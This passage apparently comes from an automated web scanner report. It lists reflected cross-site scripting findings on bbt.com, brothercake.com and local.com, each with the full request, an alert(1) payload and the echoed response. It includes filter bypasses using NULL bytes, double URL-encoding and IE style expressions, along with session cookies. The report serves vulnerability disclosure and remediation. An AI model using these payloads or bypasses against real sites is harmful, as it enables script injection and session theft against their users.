This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /bbt/mobile/mobile-product.html?%00f9529"><script>alert(1)</script>45d303da152=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:30 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 30271
cache-control: private
x-powered-by: ASP.NET


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
   
   
                   
...[SNIP]...
<a href="/bbt/mobile/mobile-product.html?page=print&%00f9529"><script>alert(1)</script>45d303da152=1" onclick="NewWindow(this.href,'product','650','500','yes');return false;">
...[SNIP]...

4.447. http://www.bbt.com/bbt/personal/products/checkcard/default.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbt.com
Path:   /bbt/personal/products/checkcard/default.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0055e59"><script>alert(1)</script>759ab4bcd91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 55e59"><script>alert(1)</script>759ab4bcd91 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /bbt/personal/products/checkcard/default.html?%0055e59"><script>alert(1)</script>759ab4bcd91=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:33 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 31030
cache-control: private
x-powered-by: ASP.NET


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
   
...[SNIP]...
<a href="/bbt/personal/products/checkcard/default.html?page=print&%0055e59"><script>alert(1)</script>759ab4bcd91=1" onclick="NewWindow(this.href,'product','650','500','yes');return false;">
...[SNIP]...

4.448. http://www.bbt.com/bbt/personal/products/onlinebanking/default.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbt.com
Path:   /bbt/personal/products/onlinebanking/default.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %006f039"><script>alert(1)</script>d7e45a2b9d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6f039"><script>alert(1)</script>d7e45a2b9d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /bbt/personal/products/onlinebanking/default.html?%006f039"><script>alert(1)</script>d7e45a2b9d5=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:39 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 35938
cache-control: private
x-powered-by: ASP.NET


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
   
   
               
...[SNIP]...
<a href="/bbt/personal/products/onlinebanking/default.html?page=print&%006f039"><script>alert(1)</script>d7e45a2b9d5=1" onclick="NewWindow(this.href,'product','650','500','yes');return false;">
...[SNIP]...

4.449. http://www.bbt.com/bbt/sitemap.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbt.com
Path:   /bbt/sitemap.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %009f75f"><script>alert(1)</script>ddf7c1767f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9f75f"><script>alert(1)</script>ddf7c1767f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /bbt/sitemap.html?%009f75f"><script>alert(1)</script>ddf7c1767f3=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:11:59 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 32253
cache-control: private
x-powered-by: ASP.NET


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
   
   
...[SNIP]...
<a href="/bbt/sitemap.html?page=print&%009f75f"><script>alert(1)</script>ddf7c1767f3=1" onclick="NewWindow(this.href,'product','650','500','yes');return false;">
...[SNIP]...

4.450. https://www.bbt.com/images/chat/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.bbt.com
Path:   /images/chat/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00a1daf"><script>alert(1)</script>1641a099e6e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a1daf"><script>alert(1)</script>1641a099e6e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /images/chat/?%00a1daf"><script>alert(1)</script>1641a099e6e=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:33 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 207
cache-control: private
x-powered-by: ASP.NET
Via: 1.1 www.bbt.com (Alteon iSD-SSL/5.1.7)


               <html><head><meta http-equiv="refresh" content="0;url=http://www.bbt.com/errors/403-14.asp?403;http://172.30.10.46:80/images/chat/?%00a1daf"><script>alert(1)</script>1641a099e6e=1"></head></html
...[SNIP]...

4.451. https://www.bbt.com/images/chat/oao-matrix/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.bbt.com
Path:   /images/chat/oao-matrix/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00de7c6"><script>alert(1)</script>3830aed06ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as de7c6"><script>alert(1)</script>3830aed06ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /images/chat/oao-matrix/?%00de7c6"><script>alert(1)</script>3830aed06ac=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:34 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 218
cache-control: private
x-powered-by: ASP.NET
Via: 1.1 www.bbt.com (Alteon iSD-SSL/5.1.7)


               <html><head><meta http-equiv="refresh" content="0;url=http://www.bbt.com/errors/403-14.asp?403;http://172.30.10.46:80/images/chat/oao-matrix/?%00de7c6"><script>alert(1)</script>3830aed06ac=1"></
...[SNIP]...

4.452. https://www.bbt.com/images/chat/oao/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.bbt.com
Path:   /images/chat/oao/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00fd8c7"><script>alert(1)</script>c4970a877ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fd8c7"><script>alert(1)</script>c4970a877ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /images/chat/oao/?%00fd8c7"><script>alert(1)</script>c4970a877ed=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:35 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 211
cache-control: private
x-powered-by: ASP.NET
Via: 1.1 www.bbt.com (Alteon iSD-SSL/5.1.7)


               <html><head><meta http-equiv="refresh" content="0;url=http://www.bbt.com/errors/403-14.asp?403;http://172.30.10.46:80/images/chat/oao/?%00fd8c7"><script>alert(1)</script>c4970a877ed=1"></head></
...[SNIP]...

4.453. https://www.bbt.com/images/chat/vcsp/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.bbt.com
Path:   /images/chat/vcsp/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00ae575"><script>alert(1)</script>447eca9d97b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ae575"><script>alert(1)</script>447eca9d97b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /images/chat/vcsp/?%00ae575"><script>alert(1)</script>447eca9d97b=1 HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:39 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 212
cache-control: private
x-powered-by: ASP.NET
Via: 1.1 www.bbt.com (Alteon iSD-SSL/5.1.7)


               <html><head><meta http-equiv="refresh" content="0;url=http://www.bbt.com/errors/403-14.asp?403;http://172.30.10.46:80/images/chat/vcsp/?%00ae575"><script>alert(1)</script>447eca9d97b=1"></head><
...[SNIP]...

4.454. http://www.brothercake.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.brothercake.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 350fe"><script>alert(1)</script>79cd7322848 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 350fe\"><script>alert(1)</script>79cd7322848 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?350fe"><script>alert(1)</script>79cd7322848=1 HTTP/1.1
Host: www.brothercake.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:22:32 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Cache-control: private
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Set-Cookie: PHPSESSID=3f722a0b27bbf1e02a7a38b563ec2988; path=/
Connection: close
Content-Type: text/html
Content-Length: 20228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta http
...[SNIP]...
<form id="stylesForm" action="/?350fe\"><script>alert(1)</script>79cd7322848=1" method="post">
...[SNIP]...

4.455. http://www.local.com/dart/ [cat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14aca%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee268f1e14c1 was submitted in the cat parameter. This input was echoed as 14aca"><script>alert(1)</script>e268f1e14c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the cat request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services14aca%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee268f1e14c1&zone=locm.sp%2fretail_banks_15020100 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 1107
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:25:15 GMT
Connection: close
Content-Length: 1107


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=1;tile=1;cat=financial_services14aca"><script>alert(1)</script>e268f1e14c1;city=dallas_tx;sz=728x90;ord=1296748812638?" target="_blank">
...[SNIP]...

4.456. http://www.local.com/dart/ [cat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the cat request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 629be%2527%253balert%25281%2529%252f%252f3d8ca4cb923 was submitted in the cat parameter. This input was echoed as 629be';alert(1)//3d8ca4cb923 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the cat request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services629be%2527%253balert%25281%2529%252f%252f3d8ca4cb923&zone=locm.sp%2fretail_banks_15020100 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 1062
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:25:15 GMT
Connection: close
Content-Length: 1062


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=1;tile=1;cat=financial_services629be';alert(1)//3d8ca4cb923;city=dallas_tx;sz=728x90;ord=1296748812638?" type="text/javascript">
...[SNIP]...

4.457. http://www.local.com/dart/ [css parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the css request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36ffb"style%3d"x%3aexpression(alert(1))"4094d82a023 was submitted in the css parameter. This input was echoed as 36ffb"style="x:expression(alert(1))"4094d82a023 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /dart/?ag=True&css=banner36ffb"style%3d"x%3aexpression(alert(1))"4094d82a023&p=locm.pp&pos=1&t=1&sz=728x90&ord=1296748883062&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/sterling-bank-16856575/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 890
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:29 GMT
Connection: close
Content-Length: 890


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
